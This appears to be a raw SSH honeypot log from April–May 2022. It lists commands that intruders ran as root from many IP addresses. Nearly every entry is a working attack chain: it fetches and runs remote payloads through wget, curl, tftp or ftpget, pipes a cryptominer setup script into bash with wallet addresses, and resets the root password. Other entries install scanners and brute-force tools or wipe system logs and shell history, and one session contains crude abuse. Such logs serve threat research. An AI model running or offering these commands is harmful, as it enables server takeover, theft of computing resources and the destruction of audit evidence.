cd /var
rm -rf sh
wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119
chmod 777 sh
./sh root
rm -rf sh

From 209.141.57.143 26-Apr-2022 08:38:13 ssh2 root
Exec cd /tmp && wget 209.141.48.15:8000/miner.tar || curl -o miner.tar 209.141.48.15:8000/miner.tar && tar xvf miner.tar && cd miner && chmod +x * && ./miner; rm -rf *; rm -rf ../*
cd /tmp
wget 209.141.48.15:8000/miner.tar || curl -o miner.tar 209.141.48.15:8000/miner.tar
tar xvf miner.tar
cd miner
chmod +x *
./miner
rm -rf *
rm -rf ../*

From 45.85.190.242 26-Apr-2022 14:25:35 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://45.85.190.242/sh || curl -O http://45.85.190.242/sh || tftp 45.85.190.242 -c get sh; tftp -g -r sh 45.85.190.242; chmod 777 sh;./sh root; rm -rf sh
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://45.85.190.242/sh || curl -O http://45.85.190.242/sh || tftp 45.85.190.242 -c get sh
tftp -g -r sh 45.85.190.242
chmod 777 sh
./sh root
rm -rf sh

From 20.127.13.19 26-Apr-2022 22:49:21 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred5.txt -o /tmp/dred5.txt;perl /tmp/dred5.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred5.txt -o /tmp/dred5.txt
perl /tmp/dred5.txt

From 179.43.154.185 28-Apr-2022 05:51:54 ssh2 root
Exec echo root:dss4tij24jtiu3ji43rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dss4tij24jtiu3ji43rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 34.125.143.40 28-Apr-2022 09:05:43 ssh2 root
Exec cd /tmp ; wget 157.90.20.84/ok.sh | curl -O 157.90.20.84/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 157.90.20.84/ok.sh | curl -O 157.90.20.84/ok.sh
chmod 777 ok.sh
./ok.sh
rm -rf ok.sh
history -c

From 179.43.156.214 28-Apr-2022 09:25:41 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh || tftp -g -r sh 185.28.39.119
chmod 777 sh
./sh root
rm -rf sh

From 34.143.230.194 28-Apr-2022 11:17:17 ssh2 root
Exec cd /tmp ; wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh
chmod 777 ok.sh
./ok.sh
rm -rf ok.sh
history -c

From 34.125.143.40 28-Apr-2022 20:48:36 ssh2 root
Exec cd /tmp ; wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 64.31.49.50/ok.sh | curl -O 64.31.49.50/ok.sh
chmod 777 ok.sh
./ok.sh
rm -rf ok.sh
history -c

From 43.135.132.174 29-Apr-2022 15:06:30 ssh2 root
Exec echo -n 2j1hjoxu|md5sum;uname -a
echo -n 2j1hjoxu|md5sum
uname -a

From 62.197.136.83 29-Apr-2022 16:11:44 ssh2 root
Exec wget 209.141.34.115/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 209.141.34.115/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 179.43.156.214 30-Apr-2022 06:18:13 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh; tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh
tftp -g -r sh 185.28.39.119
chmod 777 sh
./sh root
rm -rf sh

From 216.224.123.24 30-Apr-2022 07:11:51 ssh2 root
Exec cat /etc/os-release
cat /etc/os-release

From 179.43.156.214 30-Apr-2022 07:18:11 ssh2 root
Exec cd /tmp; cd /dev; cd /mnt; cd /var; rm -rf sh; wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh; tftp -g -r sh 185.28.39.119; chmod 777 sh;./sh root; rm -rf sh
cd /tmp
cd /dev
cd /mnt
cd /var
rm -rf sh
wget http://185.28.39.119/sh || curl -O http://185.28.39.119/sh || tftp 185.28.39.119 -c get sh
tftp -g -r sh 185.28.39.119
chmod 777 sh
./sh root
rm -rf sh

From 35.189.4.165 30-Apr-2022 13:12:56 ssh2 root
Exec cd /tmp ; wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh
chmod 777 ok.sh
./ok.sh
rm -rf ok.sh
history -c

From 64.31.49.114 30-Apr-2022 17:12:12 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.95.55.17/76d32be0.sh; curl -O http://45.95.55.17/76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp 45.95.55.17 -c get 76d32be0.sh; chmod 777 76d32be0.sh; sh 76d32be0.sh; tftp -r 76d32be02.sh -g 45.95.55.17; chmod 777 76d32be02.sh; sh 76d32be02.sh; ftpget -v -u anonymous -p anonymous -P 21 45.95.55.17 76d32be01.sh 76d32be01.sh; sh 76d32be01.sh; rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.95.55.17/76d32be0.sh
curl -O http://45.95.55.17/76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp 45.95.55.17 -c get 76d32be0.sh
chmod 777 76d32be0.sh
sh 76d32be0.sh
tftp -r 76d32be02.sh -g 45.95.55.17
chmod 777 76d32be02.sh
sh 76d32be02.sh
ftpget -v -u anonymous -p anonymous -P 21 45.95.55.17 76d32be01.sh 76d32be01.sh
sh 76d32be01.sh
rm -rf 76d32be0.sh 76d32be0.sh 76d32be02.sh 76d32be01.sh
rm -rf *

From 106.126.14.181 2-May-2022 02:48:58 ssh2 root
Exec cd /tmp ; wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh ; chmod 777 ok.sh ; ./ok.sh ; rm -rf ok.sh ; history -c
cd /tmp
wget 34.125.122.145/ok.sh | curl -O 34.125.122.145/ok.sh
chmod 777 ok.sh
./ok.sh
rm -rf ok.sh
history -c

From 179.43.154.185 2-May-2022 17:37:01 ssh2 root
Exec echo root:ds34tij24iu33ji433r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:ds34tij24iu33ji433r3g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 37.0.11.130 5-May-2022 06:15:39 ssh2 root
Exec cat /proc/cpuinfo | grep 'model name'
cat /proc/cpuinfo | grep 'model name'

From 37.0.11.130 5-May-2022 09:09:16 ssh2 root
Exec cat /proc/cpuinfo | grep 'model name'
cat /proc/cpuinfo | grep 'model name'

From 179.43.142.180 6-May-2022 01:52:28 ssh2 root
Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jtiu3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 61.183.35.20 7-May-2022 01:45:55 ssh2 root
Exec nproc;uname -a
nproc
uname -a

From 93.191.115.126 7-May-2022 08:18:56 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred7.txt -o /tmp/dred7.txt;perl /tmp/dred7.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred7.txt -o /tmp/dred7.txt
perl /tmp/dred7.txt

From 179.43.154.185 7-May-2022 22:36:50 ssh2 root
Exec echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 92.204.160.154 8-May-2022 06:21:41 ssh2 root
Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2
uname -a
cd /tmp
curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 47GZnxsEvU1gRaShZCzDxo7TY7LV2688REobA3gFkk3RewKtpYGi9jK1qmFdUkaPD5N2rH5C7drRNe67z4RzVciMBgxhcu2

From 179.43.142.180 9-May-2022 10:34:59 ssh2 root
Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jtiu3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.142.180 9-May-2022 13:34:27 ssh2 root
Exec echo root:dgtij24jtiu3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jtiu3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 222.186.57.13 11-May-2022 11:25:11 ssh2 root
lscpu
netstat -antp
netstat -antp
uname -a
ifconfig
ethtool eth0
yum install net-tools
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43TzrzryJgiH4UBjkgx6jgB6Rkx5AmcAg9grAJHVTFaZepwvMhX1KwTMMZV1iU9rQnDsE5X5zWAoKguABvKcLrVgQu9UtWi rm -rf /root/.bash_history echo>/var/log/syslog echo>/var/log/messages echo>/var/log/httpd/access_log echo>/var/log/httpd/error_log echo>/var/log/xferlog echo>/var/log/secure echo>/var/log/auth.log echo>/var/log/user.log echo>/var/log/lastlog echo>/var/log/btmp echo>/var/run/utmp echo>/var/log/wtmp rm -rf .bash_history history -c history -c

From 178.62.216.128 12-May-2022 02:22:01 ssh2 root
Exec curl -O http://134.122.59.164/systemd && curl -O http://134.122.59.164/banner.log && curl -O http://134.122.59.164/bios.txt && curl -O http://134.122.59.164/bone && curl -O http://134.122.59.164/brute && curl -O http://134.122.59.164/hrdmv1 && curl -O http://134.122.59.164/loop && curl -O http://134.122.59.164/mfu.txt && curl -O http://134.122.59.164/motd && curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd && wget http://134.122.59.164/pass_file && wget http://134.122.59.164/motd && wget http://134.122.59.164/mfu.txt && wget http://134.122.59.164/loop && wget http://134.122.59.164/hrdmv1 && wget http://134.122.59.164/brute && wget http://134.122.59.164/boner && wget http://134.122.59.164/bios.txt && wget http://134.122.59.164/banner.log && chmod 777 * && bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX && apt install -y zmap || yum install -y zmap || dnf install -y zmap && apt install -y screen || yum install -y screen || dnf install -y screen && screen -S 'auto' ./loop
curl -O http://134.122.59.164/systemd
curl -O http://134.122.59.164/banner.log
curl -O http://134.122.59.164/bios.txt
curl -O http://134.122.59.164/bone
curl -O http://134.122.59.164/brute
curl -O http://134.122.59.164/hrdmv1
curl -O http://134.122.59.164/loop
curl -O http://134.122.59.164/mfu.txt
curl -O http://134.122.59.164/motd
curl -O http://134.122.59.164/pass_file || wget http://134.122.59.164/systemd
wget http://134.122.59.164/pass_file
wget http://134.122.59.164/motd
wget http://134.122.59.164/mfu.txt
wget http://134.122.59.164/loop
wget http://134.122.59.164/hrdmv1
wget http://134.122.59.164/brute
wget http://134.122.59.164/boner
wget http://134.122.59.164/bios.txt
wget http://134.122.59.164/banner.log
chmod 777 *
bash -c './systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX' || ./systemd -v --av=0 -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id ZTX
apt install -y zmap || yum install -y zmap || dnf install -y zmap
apt install -y screen || yum install -y screen || dnf install -y screen
screen -S 'auto' ./loop

From 185.188.182.226 12-May-2022 10:22:01 ssh2 root
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 139.99.131.116 13-May-2022 06:50:38 ssh2 root
Exec cd /tmp ; rm -rf ok.sh wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 46.105.83.253/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
rm -rf ok.sh wget 46.105.83.253/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 46.105.83.253/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 46.105.83.253/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 45.61.188.244 13-May-2022 12:26:41 ssh2 root
Exec wget 194.31.98.205/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 194.31.98.205/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 179.43.154.185 13-May-2022 17:20:02 ssh2 root
Exec echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:d3s34tij24iu33ji43g33r3g|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 106.126.14.180 14-May-2022 09:25:44 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt;perl /tmp/dred6.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt
perl /tmp/dred6.txt

From 182.66.193.220 14-May-2022 11:47:30 ssh2 root
Exec uname -a;cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;history -c
uname -a
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
history -c

From 139.99.131.116 14-May-2022 14:44:45 ssh2 root
Exec cd /tmp ; rm -rf ok.sh wget 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 46.105.83.253/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 46.105.83.253/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
rm -rf ok.sh wget 46.105.83.253/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 46.105.83.253/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 46.105.83.253/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 20.91.186.105 15-May-2022 01:49:08 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt;perl /tmp/dred6.txt
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://130.0.164.120/dred6.txt -o /tmp/dred6.txt
perl /tmp/dred6.txt

From 179.43.142.180 15-May-2022 09:18:12 ssh2 root
Exec echo root:dgtij24jti3u3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jti3u3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 106.10.122.53 15-May-2022 10:27:30 ssh2 root
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 106.10.122.53 15-May-2022 10:37:09 ssh2 root
Exec nproc;nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 179.43.142.180 15-May-2022 21:21:18 ssh2 root
Exec echo root:dgtij24jti3u3ji4rg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij24jti3u3ji4rg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 178.138.98.73 16-May-2022 06:24:22 ssh2 root
w
ls -a
lscpu
w
ls -a
halt
/init 1
init 1
suck my cook
lick my balls
suck my BIG ROMANIAN DICK
you lil ugly duck :)))
exit

From 139.99.131.116 16-May-2022 14:27:59 ssh2 root
Exec cd /tmp ; rm -rf ok.sh wget 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 139.99.131.116/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
rm -rf ok.sh wget 139.99.131.116/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 139.99.131.116/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 139.99.131.116/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 139.99.131.116 16-May-2022 21:49:00 ssh2 root
Exec cd /tmp ; rm -rf ok.sh wget 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 139.99.131.116/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 139.99.131.116/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
rm -rf ok.sh wget 139.99.131.116/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 139.99.131.116/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 139.99.131.116/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 209.141.60.126 17-May-2022 11:19:06 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 209.141.60.126 17-May-2022 12:19:06 ssh2 root
Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456
cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.117.168/krn.tar || curl -o krn.tar http://205.185.117.168/krn.tar
tar -xf krn.tar
cd krn
chmod +x *
./sshd
./krane 123456

From 122.155.165.65 17-May-2022 19:27:26 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 103.152.37.54 17-May-2022 19:33:48 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
